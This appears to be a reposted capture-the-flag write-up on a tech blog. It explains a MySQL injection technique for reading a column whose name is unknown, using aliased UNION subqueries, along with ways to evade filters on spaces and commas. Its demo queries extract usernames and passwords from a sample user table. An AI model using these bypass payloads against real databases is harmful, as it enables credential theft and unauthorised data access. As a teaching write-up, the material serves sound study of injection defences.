How to bypass unknown field names in MySQL

Preface

This article introduces the fifth question of DDCTF, the technique of bypassing unknown field names. Here I use the local machine to operate it. The idea is great and clear. Share it with everyone. Let's take a look at the detailed introduction:

Implementation ideas

The question filters spaces and commas. Spaces can be bypassed using %0a, %0b, %0c, %0d, %a0, or parentheses directly. Commas can be bypassed using join.

The field name storing the flag is unknown, and information_schema.columns also filters the hex of the table name, that is, the field name cannot be obtained; in this case, a joint query can be used, and the process is as follows:

The idea is to get the flag and make it appear under a known field name;

Sample code:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
| 1 | admin | admin888 | [email protected] |
| 2 | test | test123 | [email protected] |
| 3 | cs | cs123 | [email protected] |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4 |
+-------------+
| 4 |
| [email protected] |
| [email protected] |
| [email protected] |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4 |
+-------------+
| [email protected] |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id | username | password | email |
+-------------+----------+----------+-------------+
| 1 | admin | admin888 | [email protected] |
| [email protected] | 1 | 1 | 1 |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

Summarize

The above is the full content of this article. I hope that the content of this article can bring some help to your study or work. If you have any questions, you can leave a message to communicate. Thank you for your support of 123WORDPRESS.COM.

You may also be interested in:

Prevent xss and sql injection: JS special character filtering regular
A SQL statement to filter duplicate data
Summary of MySQL injection bypass filtering techniques
SQL injection bypasses single quote restriction and continues injection
Summary of SQL injection bypass techniques
Using multi-column composite indexes to bypass a bug in Microsoft SQL Server
Some knowledge points about SQL injection bypass
Method for recovering accidentally deleted heap table records in SQL Server simple mode (bypassing header verification)
SQL injection techniques: Detailed analysis of bypassing comma filtering in explicit and blind injections

<<: Tomcat obtains the client domain name of Nginx reverse proxy

>>: How to reduce image size using Docker multi-stage build